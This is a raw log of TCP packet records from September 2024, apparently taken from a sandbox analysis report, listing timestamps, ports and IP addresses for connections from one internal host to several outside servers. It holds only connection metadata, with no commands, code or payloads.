Sep 26, 2024 20:15:07.279932022 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:07.281450033 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:07.281460047 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:07.281719923 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:07.282910109 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:07.282927990 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:07.282979012 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:07.302076101 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.302165031 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.302270889 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.302333117 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.302521944 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.302573919 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.302711964 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.302762985 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.303066969 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.303158045 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.303364038 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.303420067 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.461157084 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.461354017 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.461364985 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.461431026 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.461642027 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.461709023 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.461935997 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.462013006 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.462213039 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.462270021 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.462433100 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.462483883 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.462624073 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.462678909 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.462820053 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.462874889 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.468280077 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.468343019 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.468481064 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.468532085 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.468842983 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.468943119 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.469085932 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.469153881 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.469398022 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.469455004 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.469569921 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.469624996 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.469769001 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.469826937 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.470520973 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.470583916 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.470696926 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.470751047 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.607862949 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.607949972 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.608048916 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.608108044 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.608381033 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.608438015 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.608541012 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.608593941 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.608736038 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.608789921 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.608829021 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.608882904 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.608896971 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.608913898 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.608936071 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.608969927 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.609381914 CEST	49743	443	192.168.2.5	172.105.54.160
Sep 26, 2024 20:15:07.609400034 CEST	443	49743	172.105.54.160	192.168.2.5
Sep 26, 2024 20:15:07.693507910 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:07.693572044 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:07.693641901 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:07.693897963 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:07.693912029 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:07.757132053 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:07.757229090 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:07.757282972 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:07.763160944 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:07.763183117 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:07.763195038 CEST	49745	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:07.763200998 CEST	443	49745	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:07.815474987 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:07.815501928 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:07.815561056 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:07.825124979 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:07.825138092 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:08.326394081 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:08.326467991 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:08.328085899 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:08.328093052 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:08.328356028 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:08.329653025 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:08.329669952 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:08.329724073 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:08.376857996 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:08.377161980 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:08.378283024 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:08.378295898 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:08.380424023 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:08.380431890 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:08.851455927 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:08.851937056 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:08.852093935 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:08.852093935 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:08.852093935 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:08.868633032 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:08.868675947 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:08.868737936 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:08.869108915 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:08.869127989 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:09.162581921 CEST	49747	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:09.162611008 CEST	443	49747	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:10.164664984 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.164772987 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.164797068 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.164833069 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.164861917 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.164880037 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.171957970 CEST	49746	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.171972990 CEST	443	49746	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.172408104 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.172517061 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:10.173721075 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.173765898 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.174269915 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.174324036 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:10.174329996 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.174546957 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.174559116 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.174560070 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.175751925 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:10.175751925 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:10.175832987 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.629235029 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.629370928 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.629477024 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:10.629641056 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:10.629641056 CEST	49748	443	192.168.2.5	172.67.162.108
Sep 26, 2024 20:15:10.629658937 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.629667044 CEST	443	49748	172.67.162.108	192.168.2.5
Sep 26, 2024 20:15:10.648160934 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:10.648214102 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:10.648297071 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:10.648636103 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:10.648658037 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:10.822802067 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.822931051 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.823352098 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.823363066 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:10.824985027 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:10.824991941 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:11.124731064 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.124805927 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:11.126343966 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:11.126355886 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.126741886 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.128004074 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:11.128024101 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:11.128093004 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.535965919 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:11.536048889 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:11.536055088 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:11.536160946 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:11.536251068 CEST	49749	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:11.536272049 CEST	443	49749	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:11.564166069 CEST	49751	80	192.168.2.5	45.132.206.251
Sep 26, 2024 20:15:11.569070101 CEST	80	49751	45.132.206.251	192.168.2.5
Sep 26, 2024 20:15:11.570363998 CEST	49751	80	192.168.2.5	45.132.206.251
Sep 26, 2024 20:15:11.570560932 CEST	49751	80	192.168.2.5	45.132.206.251
Sep 26, 2024 20:15:11.570601940 CEST	49751	80	192.168.2.5	45.132.206.251
Sep 26, 2024 20:15:11.575418949 CEST	80	49751	45.132.206.251	192.168.2.5
Sep 26, 2024 20:15:11.575604916 CEST	80	49751	45.132.206.251	192.168.2.5
Sep 26, 2024 20:15:11.575639009 CEST	80	49751	45.132.206.251	192.168.2.5
Sep 26, 2024 20:15:11.575726986 CEST	80	49751	45.132.206.251	192.168.2.5
Sep 26, 2024 20:15:11.606497049 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.606611967 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.606686115 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:11.606832981 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:11.606897116 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.606935024 CEST	49750	443	192.168.2.5	188.114.96.3
Sep 26, 2024 20:15:11.606951952 CEST	443	49750	188.114.96.3	192.168.2.5
Sep 26, 2024 20:15:11.625200033 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:11.625246048 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:11.625334978 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:11.626163006 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:11.626182079 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.151918888 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.151999950 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:12.154155970 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:12.154169083 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.154522896 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.156035900 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:12.156061888 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:12.156142950 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.352721930 CEST	80	49751	45.132.206.251	192.168.2.5
Sep 26, 2024 20:15:12.353249073 CEST	49751	80	192.168.2.5	45.132.206.251
Sep 26, 2024 20:15:12.629234076 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.629322052 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.629384041 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:12.630177975 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:12.630198956 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.630237103 CEST	49752	443	192.168.2.5	188.114.97.3
Sep 26, 2024 20:15:12.630244017 CEST	443	49752	188.114.97.3	192.168.2.5
Sep 26, 2024 20:15:12.684201956 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:12.684307098 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:12.684427977 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:12.685818911 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:12.685853004 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.174740076 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.174833059 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:13.176439047 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:13.176470995 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.176712036 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.178105116 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:13.178144932 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:13.178189993 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.637567043 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.637680054 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.637744904 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:13.637964010 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:13.638010979 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.638042927 CEST	49753	443	192.168.2.5	172.67.208.139
Sep 26, 2024 20:15:13.638060093 CEST	443	49753	172.67.208.139	192.168.2.5
Sep 26, 2024 20:15:13.648298979 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:13.648338079 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:13.648922920 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:13.649225950 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:13.649240971 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.285154104 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.285231113 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.286518097 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.286523104 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.286853075 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.288631916 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.335408926 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.786565065 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.786591053 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.786626101 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.786628962 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.786648035 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.786664963 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.786698103 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.887696028 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.887726068 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.887784958 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.887809038 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.887840986 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.887865067 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.895039082 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.895134926 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.895172119 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.895184994 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.912746906 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.912786961 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.912815094 CEST	49754	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:14.912823915 CEST	443	49754	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:14.954567909 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:14.954612970 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:14.954693079 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:14.955203056 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:14.955219984 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.470803022 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.470978022 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:15.472598076 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:15.472605944 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.472928047 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.474198103 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:15.474229097 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:15.474277973 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.906887054 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.906996012 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.907083988 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:15.907691956 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:15.907691956 CEST	49755	443	192.168.2.5	104.21.2.13
Sep 26, 2024 20:15:15.907706976 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:15.907716036 CEST	443	49755	104.21.2.13	192.168.2.5
Sep 26, 2024 20:15:17.924563885 CEST	49751	80	192.168.2.5	45.132.206.251
Sep 26, 2024 20:15:37.673924923 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:37.673959017 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:37.674026966 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:37.676496029 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:37.676512003 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.317110062 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.317209959 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.368904114 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.368927002 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.369149923 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.369216919 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.370667934 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.411428928 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.854417086 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.854439974 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.854454041 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.854506016 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.854525089 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.854549885 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.854573011 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.954456091 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.954478025 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.954571962 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.954590082 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.954641104 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.959778070 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.959852934 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.959861040 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.959872961 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.959903002 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.959934950 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.960220098 CEST	49757	443	192.168.2.5	104.102.49.254
Sep 26, 2024 20:15:38.960237026 CEST	443	49757	104.102.49.254	192.168.2.5
Sep 26, 2024 20:15:38.968749046 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:38.968789101 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:38.968869925 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:38.969108105 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:38.969121933 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:39.619504929 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:39.619646072 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:39.623800039 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:39.623812914 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:39.624039888 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:39.624104977 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:39.624432087 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:39.671413898 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:40.247458935 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:40.247545958 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:40.247585058 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:40.247617960 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:40.248759985 CEST	49758	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:40.248781919 CEST	443	49758	5.75.211.162	192.168.2.5
Sep 26, 2024 20:15:40.251327038 CEST	49759	443	192.168.2.5	5.75.211.162
Sep 26, 2024 20:15:40.251403093 CEST	443	49759	5.75.211.162	192.168.2.5
